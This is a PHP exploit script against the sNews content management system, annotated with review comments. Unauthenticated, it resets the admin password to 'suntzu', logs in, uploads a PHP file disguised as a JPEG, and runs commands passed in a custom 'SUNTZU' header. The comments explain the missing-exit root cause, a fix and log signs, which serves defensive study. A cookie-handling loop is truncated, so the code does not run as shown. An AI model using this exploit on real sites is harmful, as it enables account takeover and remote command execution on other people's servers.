126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; }
// The line above is the tail of a helper function whose start lies outside
// this excerpt; it is reproduced untouched and not documented here.

// Pattern used to validate the -P option value: four dot-separated groups of
// 1-3 digits, a colon, then 1-5 digits. Only digit counts are checked, not
// octet or port ranges.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

/**
 * Send one raw HTTP request over a fresh TCP connection and store the raw
 * response in the global $html.
 *
 * Reads the globals $proxy, $host, $port and $proxy_regex. When $proxy is
 * empty the socket goes to gethostbyname($host):$port; otherwise $proxy must
 * match $proxy_regex and the socket goes to the host:port it names.
 * Any connection or validation failure prints a message and terminates the
 * script with die.
 *
 * @param string $packet Complete request text (request line, headers, body).
 */
function sendpacketii($packet) {
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    // Direct connection to the target.
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) { echo 'No response from '.$host.':'.$port; die; }
  } else {
    // Connection through the proxy given with -P.
    $c = preg_match($proxy_regex,$proxy);
    if (!$c) { echo 'Not a valid proxy...';die; }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) { echo 'No response from proxy...';die; }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    // Direct: read line by line until the peer closes the connection.
    $html='';
    while (!feof($ock)) { $html.=fgets($ock); }
  } else {
    // Proxy: read one byte at a time; the loop keeps going while the socket
    // is not at EOF or $html does not yet contain CR LF CR LF.
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); }
  }
  fclose($ock);
}

// Command line: argv[1] = host, argv[2] = path, argv[3] = the caller's IP.
// From argv[4] on, an argument starting with "-p" sets the port, one starting
// with "-P" sets the proxy (and overwrites $your_ip with the proxy's host
// part); every other argument is appended to $cmd.
$host=$argv[1]; $path=$argv[2]; $your_ip=$argv[3]; $port=80; $proxy=""; $cmd="";
for ($i=4; $i<$argc; $i++){
  $temp=$argv[$i][0].$argv[$i][1];
  if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
  if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); }
  if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); $tmp=explode(":",$proxy); $your_ip=$tmp[0]; }
}
// The path must both start and end with "/".
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
// Through a proxy the request line carries an absolute URL instead of a path.
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

/*
software site: http://www.solucija.com/home/snews/

Unauthenticated requests can reach the admin password-reset feature (and
other admin features); after that a PHP file can be uploaded and commands
launched.

See snews.php near lines 392-395:
...
function center() {
  if (isset($_GET['category'])) {$id = $action = $_GET['category'];}
  if (isset($_GET['articleid'])) {$articleid = $_GET['articleid'];}
  if (isset($_POST['submit_text'])) {processing(); $processed = true;}
...
Now look at the processing() function near line 1300:
...
function processing() {
  if ($_SESSION[db('website').'Logged_In'] != 'True') {notification(l('error_not_logged_in'),'','login/');}
...
and at notification() near lines 675-680 (the HTML inside its string
literals was stripped from this copy, so the quote below is incomplete):
...
function notification($error, $errNote, $link) {
  $errNote = !empty($errNote) ? ' '.$errNote : '';
  echo ''.l('admin_error').' '.$error.$errNote.' ' : '>'.l('operation_completed').'');
  echo (!empty($link)) ? ' '.l('back').' ' : '';
}
...
funny! there is no exit() or die()...

Root cause, as the quoted code shows: processing() calls notification() when
the session is not logged in, but notification() only echoes a message and
returns, so processing() carries on with the requested task for a caller who
is not authenticated. The fix is to end the request at that check (return or
exit right after notification()), so that no state-changing task runs without
a logged-in session.

NOTE(review): the upload step further down sends a file part named
config.php while declaring it image/jpeg, which suggests the upload handler
does not reject executable extensions - confirm against the handler and
restrict it; the handler itself is not shown here.

What the traffic below looks like in logs: a POST with no session cookie
carrying submit_text together with task=changeup and submit_pass; a POST to
<path>files/ with a .php file name; a GET for <path>config.php carrying a
non-standard "SUNTZU" request header; an admin account whose user name has
changed.

This script resets the admin password and tries to upload a PHP file.
*/

// Request 1: multipart POST to the site path, sent without any cookie. It
// submits task=changeup with a new user name and password (pass1/pass2).
$data='-----------------------------7d61bcd1f033e Content-Disposition: form-data; name="submit_text"; 1 -----------------------------7d61bcd1f033e Content-Disposition: form-data; name="task"; changeup -----------------------------7d61bcd1f033e Content-Disposition: form-data; name="submit_pass"; 1 -----------------------------7d61bcd1f033e Content-Disposition: form-data; name="uname"; suntzu -----------------------------7d61bcd1f033e Content-Disposition: form-data; name="pass1"; suntzu -----------------------------7d61bcd1f033e Content-Disposition: form-data; name="pass2"; suntzu -----------------------------7d61bcd1f033e-- ';
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);

// Request 2: ordinary login POST with the credentials set by request 1.
$data ="uname=suntzu";
$data.="&pass=suntzu";
$data.="&Loginform=True";
$data.="&submit=Login";
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
// The login counts as successful only if the response contains "Admin"
// (case-insensitive match).
if (!eregi("Admin",$html)){die("exploit failed...");}

// Session cookie collection from the Set-Cookie headers of the login response.
// NOTE(review): the for statement below is truncated in this copy - the text
// between the loop condition and the echo of $cookie was lost in extraction,
// so the script does not parse as shown. It is kept exactly as found.
$cookie=""; $temp=explode("Set-Cookie: ",$html); for ($i=1; $i ".$cookie."\n";

// Request 3: authenticated multipart POST to <path>files/. The file part is
// named config.php and declared as image/jpeg; in this copy the part has no
// body. upload_dir is ".", and $your_ip is sent in the "ip" field.
$data='-----------------------------7d61bcd1f033e Content-Disposition: form-data; name="upload_dir"; . -----------------------------7d61bcd1f033e Content-Disposition: form-data; name="imagefile"; filename="config.php" Content-Type: image/jpeg; -----------------------------7d61bcd1f033e Content-Disposition: form-data; name="ip"; '.$your_ip.' 
-----------------------------7d61bcd1f033e Content-Disposition: form-data; name="time"; 1 -----------------------------7d61bcd1f033e Content-Disposition: form-data; name="upload"; Upload -----------------------------7d61bcd1f033e-- ';
$packet ="POST ".$p."files/ HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);

// Request 4: GET for <path>config.php with the collected command-line
// arguments ($cmd) placed in a custom "SUNTZU" request header.
$packet ="GET ".$p."config.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="SUNTZU: ".$cmd."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
// Whatever the response holds after the first "my_delim" marker (up to the
// next one, if any) is printed; without a marker the fallback message is shown.
if (eregi("my_delim",$html)) { $temp=explode("my_delim",$html); echo $temp[1]; } else { echo "exploit succeeded... but, for some reason, failed to upload shell, try to login manually with user 'suntzu' & password 'suntzu'"; }
?>